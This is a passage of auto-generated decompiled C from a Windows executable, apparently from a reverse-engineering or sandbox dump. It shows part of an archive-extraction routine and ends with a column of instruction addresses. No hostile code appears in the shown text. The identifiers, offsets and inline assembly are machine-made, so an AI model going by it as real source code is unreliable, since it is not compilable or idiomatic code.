							__eflags =  *((intOrPtr*)(_t810 + 0x14)) - _t651;
							if( *((intOrPtr*)(_t810 + 0x14)) == _t651) {
								L17:
								__eflags =  *(_t822 + 0x14) - _t651;
								if( *(_t822 + 0x14) != _t651) {
									L146:
									 *( *(_t822 + 0x10)) = _t651;
									L147:
									__eflags =  *((intOrPtr*)(_t810 + 0xba)) - _t651;
									if( *((intOrPtr*)(_t810 + 0xba)) != _t651) {
										_push(0x20);
										_t434 = L004079F2();
										__eflags = _t434 - _t651;
										if(_t434 == _t651) {
											_t434 = 0;
											__eflags = 0;
										} else {
											 *(_t434 + 4) = _t651;
											 *(_t434 + 8) = _t651;
											 *_t434 = 0x47aa54;
										}
										 *(_t810 + 0x9c) = _t434;
										E0040C9B4(_t810 + 0xa0, _t434);
										_t800 =  *(_t810 + 0x9c);
										__eflags = _t800 - _t651;
										 *(_t822 + 0xc) = _t800;
										if(_t800 != _t651) {
											 *((intOrPtr*)( *_t800 + 4))(_t800);
										}
										 *((char*)(_t822 - 4)) = 0x2c;
										E0040C9B4( *(_t810 + 0x9c) + 8,  *( *(_t822 + 0x10)));
										_t440 =  *( *(_t822 + 0x10));
										__eflags = _t440 - _t651;
										if(_t440 != _t651) {
											 *((intOrPtr*)( *_t440 + 8))(_t440);
										}
										 *( *(_t822 + 0x10)) = _t800;
										_t812 =  *(_t810 + 0x9c);
										_t407 = _t812 + 0x18;
										 *_t407 =  *(_t812 + 0x18) | 0xffffffff;
										__eflags =  *_t407;
										 *(_t812 + 0x10) = _t651;
										 *(_t812 + 0x14) = _t651;
										 *((char*)(_t812 + 0x1c)) = 1;
									}
									L156:
									E00407A18( *(_t822 - 0x48));
									_t425 = 0;
									L157:
									 *[fs:0x0] =  *((intOrPtr*)(_t822 - 0xc));
									return _t425;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb9)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb9)) != _t651) {
									goto L146;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb8)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb8)) == _t651) {
									 *(_t822 - 0x70) = _t651;
									 *(_t822 - 0x6e) = _t651;
									 *((char*)(_t822 - 4)) = 3;
									_t801 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 9, _t822 - 0x70);
									__eflags = _t801 - _t651;
									if(_t801 == _t651) {
										__eflags =  *(_t822 - 0x70) - 0x13;
										if( *(_t822 - 0x70) != 0x13) {
											__eflags =  *(_t822 - 0x70) - _t651;
											if( *(_t822 - 0x70) != _t651) {
												 *((char*)(_t822 - 4)) = 1;
												E0040C20F(_t822 - 0x70);
												_t801 = 0x80004005;
												L145:
												E00407A18( *(_t822 - 0x48));
												_t425 = _t801;
												goto L157;
											}
											 *(_t810 + 0x7f) = _t651;
											L32:
											 *((char*)(_t822 - 4)) = 1;
											E0040C20F(_t822 - 0x70);
											_t802 =  *(_t822 + 0xc);
											_push(_t810 + 0x7c);
											_push(_t810 + 0x60);
											_push(0xa);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7d);
											_push(_t810 + 0x68);
											_push(0xb);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7e);
											_push(_t810 + 0x70);
											_push(0xc);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											 *(_t822 + 0xb) = _t651;
											_push(_t822 + 0xb);
											_push(0x15);
											_t422 = L00417975( *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10)))), _t802);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											E00405B9F(_t822 - 0x24);
											_t803 = 0x47a420;
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 4;
											E00408833(_t822 - 0x48, _t822 - 0x24, __eflags);
											_t681 =  *((intOrPtr*)(_t822 - 0x1c));
											__eflags = _t681 - _t651;
											if(_t681 != _t651) {
												 *(_t822 + 0xc) = _t651;
												_t461 =  *((intOrPtr*)(_t810 + 0x30)) - 1;
												__eflags = _t461;
												if(_t461 == 0) {
													_t462 =  *(_t810 + 0xac);
													__eflags = _t681 - _t462;
													 *(_t822 + 0xc) = _t462;
													if(_t681 > _t462) {
														_t804 = 0;
														__eflags = 0;
														while(1) {
															__eflags = _t804 -  *(_t822 + 0xc);
															if(_t804 >=  *(_t822 + 0xc)) {
																break;
															}
															_t633 = E0040807A( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t822 - 0x18)) + _t804 * 4)))));
															__eflags = _t633 - _t651;
															if(_t633 == _t651) {
																_t804 = _t804 + 1;
																continue;
															}
															 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
															 *((char*)(_t822 - 4)) = 7;
															L89:
															E0040862D();
															 *((char*)(_t822 - 4)) = 1;
															E00408604(_t822 - 0x24);
															_t651 = 0x80004005;
															L141:
															E00407A18( *(_t822 - 0x48));
															_t425 = _t651;
															goto L157;
														}
														_t803 = 0x47a420;
														L49:
														L004036D9(_t651, _t822 - 0x24, _t810, _t651,  *(_t822 + 0xc));
														L00416D6F(_t822 - 0x24);
														L004170F2(_t822 - 0x3c, _t822 - 0x24, __eflags);
														__eflags =  *(_t822 + 0xb) - _t651;
														 *((char*)(_t822 - 4)) = 8;
														if( *(_t822 + 0xb) != _t651) {
															L71:
															_t772 = _t810 + 0x24;
															_push(_t822 - 0x3c);
															L0040B0A0(_t822 - 0x30, _t810 + 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															 *((char*)(_t822 - 4)) = 0xa;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																__eflags =  *(_t810 + 0x58) - _t651;
																if( *(_t810 + 0x58) != _t651) {
																	L117:
																	__eflags =  *(_t822 + 0xb) - _t651;
																	if( *(_t822 + 0xb) != _t651) {
																		L143:
																		E00401E26(_t810 + 0x38, _t822 - 0x30);
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																		 *((char*)(_t822 - 4)) = 0x2b;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		goto L147;
																	}
																	_push(0x20);
																	_t474 = L004079F2();
																	__eflags = _t474 - _t651;
																	if(_t474 == _t651) {
																		_t805 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t474 + 4) = _t651;
																		 *(_t474 + 8) =  *(_t474 + 8) | 0xffffffff;
																		 *_t474 = 0x47aa64;
																		_t805 = _t474;
																	}
																	__eflags = _t805 - _t651;
																	 *(_t810 + 0x94) = _t805;
																	 *(_t822 + 0x14) = _t805;
																	if(_t805 != _t651) {
																		 *((intOrPtr*)( *_t805 + 4))(_t805);
																	}
																	_t475 =  *(_t810 + 0x94);
																	 *((char*)(_t822 - 4)) = 0x26;
																	asm("sbb edx, edx");
																	 *(_t475 + 0x18) = _t651;
																	 *(_t475 + 0x1c) = _t651;
																	_t476 = L0040BD54( *((intOrPtr*)(_t822 - 0x30)), ( ~( *(_t810 + 0x58)) & 0x00000002) + 2);
																	__eflags = _t476 - _t651;
																	if(_t476 != _t651) {
																		__eflags =  *(_t810 + 0x58) - _t651;
																		if( *(_t810 + 0x58) == _t651) {
																			L142:
																			E0040C9B4(_t810 + 0x98, _t805);
																			 *((char*)(_t822 - 4)) = 0xa;
																			 *( *(_t822 + 0x10)) = _t805;
																			_t803 = 0x47a420;
																			goto L143;
																		}
																		_t479 =  *(_t810 + 0x94);
																		_t480 =  *((intOrPtr*)( *_t479 + 0x10))(_t479,  *((intOrPtr*)(_t810 + 0x50)),  *((intOrPtr*)(_t810 + 0x54)), _t651, _t651);
																		__eflags = _t480 - _t651;
																		 *(_t822 + 0xc) = _t480;
																		if(_t480 == _t651) {
																			goto L142;
																		}
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x2a;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 =  *(_t822 + 0xc);
																	} else {
																		L00412FDC(_t822 - 0x60, L"can not open output file ");
																		_t813 =  *((intOrPtr*)(_t810 + 0x18));
																		 *((char*)(_t822 - 4)) = 0x27;
																		_t490 =  *((intOrPtr*)( *_t813 + 0x1c))(_t813,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																		_push( *((intOrPtr*)(_t822 - 0x60)));
																		_t814 = _t490;
																		__eflags = _t814 - _t651;
																		if(_t814 == _t651) {
																			E00407A18();
																			__eflags = _t805 - _t651;
																			 *((char*)(_t822 - 4)) = 0xa;
																			if(_t805 != _t651) {
																				 *((intOrPtr*)( *_t805 + 8))(_t805);
																			}
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x29;
																			L94:
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			goto L141;
																		}
																		E00407A18();
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x28;
																		L123:
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 = _t814;
																	}
																	goto L141;
																}
																L0040351A(_t822 - 0x80);
																_push( *((intOrPtr*)(_t822 - 0x30)));
																 *((char*)(_t822 - 4)) = 0xc;
																_t508 = E0040B431(_t822 - 0xa8, _t772, __eflags); // executed
																__eflags = _t508 - _t651;
																if(_t508 == _t651) {
																	L116:
																	 *((char*)(_t822 - 4)) = 0xa;
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	goto L117;
																}
																_t511 =  *((intOrPtr*)(_t810 + 0x34)) - _t651;
																__eflags = _t511;
																if(_t511 == 0) {
																	asm("sbb edx, edx");
																	_t512 =  *((intOrPtr*)(_t810 + 0x18));
																	asm("sbb edx, edx");
																	_t808 =  *((intOrPtr*)( *_t512 + 0x14))(_t512,  *((intOrPtr*)(_t822 - 0x30)), _t822 - 0x90, _t822 - 0xa8,  *(_t822 - 0x48),  ~( *(_t810 + 0x7e)) & _t810 + 0x00000070,  ~( *(_t810 + 0x90)) & _t810 + 0x00000088, _t822 + 0xc);
																	__eflags = _t808 - _t651;
																	if(_t808 == _t651) {
																		_t515 =  *(_t822 + 0xc) - _t651;
																		__eflags = _t515;
																		if(_t515 == 0) {
																			L96:
																			_t803 = 0x47a420;
																			L97:
																			_t516 =  *((intOrPtr*)(_t810 + 0x34));
																			__eflags = _t516 - 3;
																			if(__eflags != 0) {
																				__eflags = _t516 - 4;
																				if(_t516 != 4) {
																					_t517 = E00409F99( *((intOrPtr*)(_t822 - 0x30)));
																					__eflags = _t517 - _t651;
																					if(_t517 != _t651) {
																						goto L116;
																					}
																					_t518 = L00403532(_t822 - 0x6c,  *0x48bd9c);
																					 *((char*)(_t822 - 4)) = 0x21;
																					L0040B0A0(_t822 - 0x60, _t518);
																					 *((char*)(_t822 - 4)) = 0x23;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t815 =  *((intOrPtr*)(_t810 + 0x18));
																					_t522 =  *((intOrPtr*)( *_t815 + 0x1c))(_t815,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t814 = _t522;
																					__eflags = _t814 - _t651;
																					if(_t814 == _t651) {
																						E00407A18();
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x25;
																						goto L94;
																					}
																					E00407A18();
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x24;
																					goto L123;
																				}
																				L004039C0(_t822 - 0x54, _t822 - 0x30);
																				 *((char*)(_t822 - 4)) = 0x18;
																				_t533 = E0040CD50(_t822 - 0x54, __eflags);
																				__eflags = _t533 - _t651;
																				if(_t533 != _t651) {
																					_t534 = E00409BC3( *((intOrPtr*)(_t822 - 0x30)),  *(_t822 - 0x54));
																					__eflags = _t534 - _t651;
																					if(_t534 != _t651) {
																						E00407A18( *(_t822 - 0x54));
																						goto L116;
																					}
																					_t536 = L00403532(_t822 - 0x6c,  *0x48bd98);
																					 *((char*)(_t822 - 4)) = 0x1c;
																					L0040B0A0(_t822 - 0x60, _t536);
																					 *((char*)(_t822 - 4)) = 0x1e;
																					E00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t816 =  *((intOrPtr*)(_t810 + 0x18));
																					_t540 =  *((intOrPtr*)( *_t816 + 0x1c))(_t816,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t817 = _t540;
																					__eflags = _t817 - _t651;
																					if(_t817 == _t651) {
																						E00407A18();
																						E00407A18( *(_t822 - 0x54));
																						E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x20;
																						L112:
																						E0040862D();
																						 *((char*)(_t822 - 4)) = 1;
																						E00408604(_t822 - 0x24);
																						L113:
																						_t817 = 0x80004005;
																						L114:
																						E00407A18( *(_t822 - 0x48));
																						_t425 = _t817;
																						goto L157;
																					}
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1f;
																					L110:
																					E0040862D();
																					 *((char*)(_t822 - 4)) = 1;
																					E00408604(_t822 - 0x24);
																					goto L114;
																				}
																				_t791 =  *0x48bd94; // 0x48be34
																				L00412FDC(_t822 - 0x60, _t791);
																				_t818 =  *((intOrPtr*)(_t810 + 0x18));
																				 *((char*)(_t822 - 4)) = 0x19;
																				_t559 =  *((intOrPtr*)( *_t818 + 0x1c))(_t818,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																				_push( *((intOrPtr*)(_t822 - 0x60)));
																				_t817 = _t559;
																				__eflags = _t817 - _t651;
																				if(_t817 == _t651) {
																					E00407A18();
																					E00407A18( *(_t822 - 0x54));
																					E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1b;
																					goto L112;
																				}
																				E00407A18();
																				E00407A18( *(_t822 - 0x54));
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x1a;
																				goto L110;
																			}
																			_t570 = E0040CD50(_t822 - 0x30, __eflags);
																			__eflags = _t570 - _t651;
																			if(_t570 != _t651) {
																				goto L116;
																			}
																			_t571 = L00403532(_t822 - 0x60,  *0x48bd94);
																			 *((char*)(_t822 - 4)) = 0x13;
																			L0040B0A0(_t822 - 0x54, _t571);
																			 *((char*)(_t822 - 4)) = 0x15;
																			E00407A18( *((intOrPtr*)(_t822 - 0x60)));
																			_t819 =  *((intOrPtr*)(_t810 + 0x18));
																			_t575 =  *((intOrPtr*)( *_t819 + 0x1c))(_t819,  *(_t822 - 0x54), _t822 - 0x30);
																			_push( *(_t822 - 0x54));
																			_t817 = _t575;
																			__eflags = _t817 - _t651;
																			if(_t817 == _t651) {
																				E00407A18();
																				E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x17;
																				goto L112;
																			}
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																			 *((char*)(_t822 - 4)) = 0x16;
																			goto L110;
																		}
																		_t584 = _t515 - 1;
																		__eflags = _t584;
																		if(_t584 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 1;
																			goto L96;
																		}
																		_t585 = _t584 - 1;
																		__eflags = _t585;
																		if(_t585 == 0) {
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x10;
																			goto L94;
																		}
																		_t589 = _t585 - 1;
																		__eflags = _t589;
																		if(_t589 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 2;
																			E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x11;
																			goto L94;
																		}
																		_t593 = _t589 - 1;
																		__eflags = _t593;
																		if(_t593 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 3;
																			goto L96;
																		}
																		_push( *((intOrPtr*)(_t822 - 0x80)));
																		__eflags = _t593 == 1;
																		if(_t593 == 1) {
																			E00407A18();
																			E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0xf;
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			_t651 = 0x80004004;
																			goto L141;
																		}
																		E00407A18();
																		E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x12;
																		goto L89;
																	}
																	E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																	E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																	 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																	 *((char*)(_t822 - 4)) = 0xe;
																	E0040862D();
																	 *((char*)(_t822 - 4)) = 1;
																	E00408604(_t822 - 0x24);
																	_t651 = _t808;
																	goto L141;
																}
																__eflags = _t511 != 0;
																if(_t511 != 0) {
																	goto L97;
																}
																E00407A18( *((intOrPtr*)(_t822 - 0x80)));
																E00407A18( *((intOrPtr*)(_t822 - 0x30)));
																E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																 *((char*)(_t822 - 4)) = 0xd;
																E0040862D();
																 *((char*)(_t822 - 4)) = 1;
																E00408604(_t822 - 0x24);
																goto L156;
															}
															_t820 = _t810 + 0x38;
															E00401E26(_t810 + 0x38, _t822 - 0x30);
															__eflags =  *(_t822 + 0xb) - _t651;
															if( *(_t822 + 0xb) != _t651) {
																E00409B24( *_t820);
															}
															E00407A18( *((intOrPtr*)(_t822 - 0x30)));
															E00407A18( *((intOrPtr*)(_t822 - 0x3c)));
															 *((intOrPtr*)(_t822 - 0x24)) = _t803;
															 *((char*)(_t822 - 4)) = 0xb;
															goto L94;
														}
														__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
														if( *((intOrPtr*)(_t810 + 0x80)) != _t651) {
															L53:
															__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
															if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
																goto L71;
															}
															 *(_t822 - 0x54) = _t651;
															 *(_t822 - 0x50) = _t651;
															 *(_t822 - 0x4c) = _t651;
															E00401E9A(_t822 - 0x54, 3);
															_push(_t822 - 0x54);
															 *((char*)(_t822 - 4)) = 9;
															E00411ED0(_t810, _t822, _t822 - 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																L70:
																 *((char*)(_t822 - 4)) = 8;
																E00407A18( *(_t822 - 0x54));
																goto L71;
															}
															__eflags =  *((intOrPtr*)(_t810 + 0x5c)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x5c)) == _t651) {
																L58:
																_t627 =  *((intOrPtr*)(_t810 + 0x10));
																__eflags =  *((intOrPtr*)(_t627 + 0x2c)) - _t651;
																if( *((intOrPtr*)(_t627 + 0x2c)) == _t651) {
																	_t628 = 0;
																	__eflags = 0;
																} else {
																	_t628 = _t627 + 0x24;
																}
																L61:
																__eflags =  *((intOrPtr*)(_t810 + 0x5b)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x5b)) == _t651) {
																	L64:
																	_t754 = 0;
																	__eflags = 0;
																	L65:
																	__eflags =  *((intOrPtr*)(_t810 + 0x5a)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x5a)) == _t651) {
																		L68:
																		_t793 = 0;
																		__eflags = 0;
																		L69:
																		E004098CF( *(_t822 - 0x54), _t793, _t754, _t628);
																		goto L70;
																	}
																	__eflags =  *((intOrPtr*)(_t810 + 0x7c)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x7c)) == _t651) {
																		goto L68;
																	}
																	_t793 = _t810 + 0x60;
																	goto L69;
																}
																__eflags =  *((intOrPtr*)(_t810 + 0x7d)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x7d)) == _t651) {
																	goto L64;
																}
																_t754 = _t810 + 0x68;
																goto L65;
															}
															__eflags =  *(_t810 + 0x7e) - _t651;
															if( *(_t810 + 0x7e) == _t651) {
																goto L58;
															}
															_t628 = _t810 + 0x70;
															goto L61;
														}
														__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
														if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
															goto L71;
														}
														E00408635(_t822 - 0x24);
														goto L53;
													}
													 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
													 *((char*)(_t822 - 4)) = 6;
													goto L89;
												}
												__eflags = _t461 == 1;
												if(_t461 == 1) {
													 *(_t822 + 0xc) = _t681 - 1;
												}
												goto L49;
											}
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 5;
											goto L89;
										}
										 *(_t810 + 0x7f) = 1;
										 *((intOrPtr*)(_t810 + 0x78)) =  *((intOrPtr*)(_t822 - 0x68));
										goto L32;
									}
									 *((char*)(_t822 - 4)) = 1;
									E0040C20F(_t822 - 0x70);
									goto L145;
								}
								_push(8);
								_t637 = L004079F2();
								__eflags = _t637 - _t651;
								if(_t637 == _t651) {
									_t821 = 0;
									__eflags = 0;
								} else {
									 *(_t637 + 4) = _t651;
									 *_t637 = 0x47aa80;
									_t821 = _t637;
								}
								__eflags = _t821 - _t651;
								if(_t821 != _t651) {
									 *((intOrPtr*)( *_t821 + 4))(_t821);
								}
								 *( *(_t822 + 0x10)) = _t821;
								goto L141;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
							_t643 = E00408E6D( *((intOrPtr*)(_t810 + 0x80)) - _t651, _t822 - 0x48, _t422 & 0xffffff00 |  *((intOrPtr*)(_t810 + 0x80)) == _t651);
							__eflags = _t643 - _t651;
							if(_t643 == _t651) {
								goto L141;
							}
							goto L17;
						}
						__eflags =  *(_t822 - 0x70) - 0x15;
						if( *(_t822 - 0x70) == 0x15) {
							 *(_t810 + 0x58) = 1;
							 *((intOrPtr*)(_t810 + 0x50)) =  *((intOrPtr*)(_t822 - 0x68));
							 *((intOrPtr*)(_t810 + 0x54)) =  *((intOrPtr*)(_t822 - 0x64));
							goto L13;
						}
						 *((char*)(_t822 - 4)) = 1;
						E0040C20F(_t822 - 0x70);
						goto L113;
					}
					 *((char*)(_t822 - 4)) = 1;
					E0040C20F(_t822 - 0x70);
					_t817 =  *(_t822 + 8);
					goto L114;
				}
				L5:
				_t651 = _t422;
				goto L141;
			}







































































                                                                                                                                    0x0041202c
                                                                                                                                    0x00412039
                                                                                                                                    0x0041203d
                                                                                                                                    0x0041203f
                                                                                                                                    0x00412042
                                                                                                                                    0x00412048
                                                                                                                                    0x00412050
                                                                                                                                    0x00412053
                                                                                                                                    0x00412058
                                                                                                                                    0x0041205b
                                                                                                                                    0x0041205b
                                                                                                                                    0x00412060
                                                                                                                                    0x00412066
                                                                                                                                    0x00412068
                                                                                                                                    0x0041206c
                                                                                                                                    0x00412071
                                                                                                                                    0x00412074
                                                                                                                                    0x00412074
                                                                                                                                    0x00412079
                                                                                                                                    0x00412084
                                                                                                                                    0x00412087
                                                                                                                                    0x0041208a
                                                                                                                                    0x00412090
                                                                                                                                    0x00412096
                                                                                                                                    0x0041209c
                                                                                                                                    0x0041209f
                                                                                                                                    0x004120a2
                                                                                                                                    0x004120a5
                                                                                                                                    0x004120b0
                                                                                                                                    0x004120b1
                                                                                                                                    0x004120b5
                                                                                                                                    0x004120b8
                                                                                                                                    0x004120ba
                                                                                                                                    0x004120c1
                                                                                                                                    0x004120d6
                                                                                                                                    0x004120db
                                                                                                                                    0x004120dd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004120e6
                                                                                                                                    0x004120eb
                                                                                                                                    0x004120ef
                                                                                                                                    0x004120fe
                                                                                                                                    0x00412103
                                                                                                                                    0x00412106
                                                                                                                                    0x00412108
                                                                                                                                    0x0041210b
                                                                                                                                    0x00412121
                                                                                                                                    0x00412125
                                                                                                                                    0x0041214f
                                                                                                                                    0x00412152
                                                                                                                                    0x00412156
                                                                                                                                    0x00412161
                                                                                                                                    0x00412162
                                                                                                                                    0x00412166
                                                                                                                                    0x0041216b
                                                                                                                                    0x0041216d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412175
                                                                                                                                    0x0041217a
                                                                                                                                    0x0041217c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00412185
                                                                                                                                    0x00412187
                                                                                                                                    0x004121a4
                                                                                                                                    0x004121a4
                                                                                                                                    0x004121a7
                                                                                                                                    0x00412bd2
                                                                                                                                    0x00412bd5
                                                                                                                                    0x00412bd7
                                                                                                                                    0x00412bd7
                                                                                                                                    0x00412bdd
                                                                                                                                    0x00412be3
                                                                                                                                    0x00412be5
                                                                                                                                    0x00412bea
                                                                                                                                    0x00412bed
                                                                                                                                    0x00412bfd
                                                                                                                                    0x00412bfd
                                                                                                                                    0x00412bef
                                                                                                                                    0x00412bef
                                                                                                                                    0x00412bf2
                                                                                                                                    0x00412bf5
                                                                                                                                    0x00412bf5
                                                                                                                                    0x00412c06
                                                                                                                                    0x00412c0c
                                                                                                                                    0x00412c11
                                                                                                                                    0x00412c17
                                                                                                                                    0x00412c19
                                                                                                                                    0x00412c1c
                                                                                                                                    0x00412c21
                                                                                                                                    0x00412c21
                                                                                                                                    0x00412c27
                                                                                                                                    0x00412c37
                                                                                                                                    0x00412c3f
                                                                                                                                    0x00412c41
                                                                                                                                    0x00412c43
                                                                                                                                    0x00412c48
                                                                                                                                    0x00412c48
                                                                                                                                    0x00412c4e
                                                                                                                                    0x00412c50
                                                                                                                                    0x00412c56
                                                                                                                                    0x00412c56
                                                                                                                                    0x00412c56
                                                                                                                                    0x00412c5a
                                                                                                                                    0x00412c5d
                                                                                                                                    0x00412c60
                                                                                                                                    0x00412c60
                                                                                                                                    0x00412c64
                                                                                                                                    0x00412c67
                                                                                                                                    0x00412c6d
                                                                                                                                    0x00412c7c
                                                                                                                                    0x00412c81
                                                                                                                                    0x00412c8a
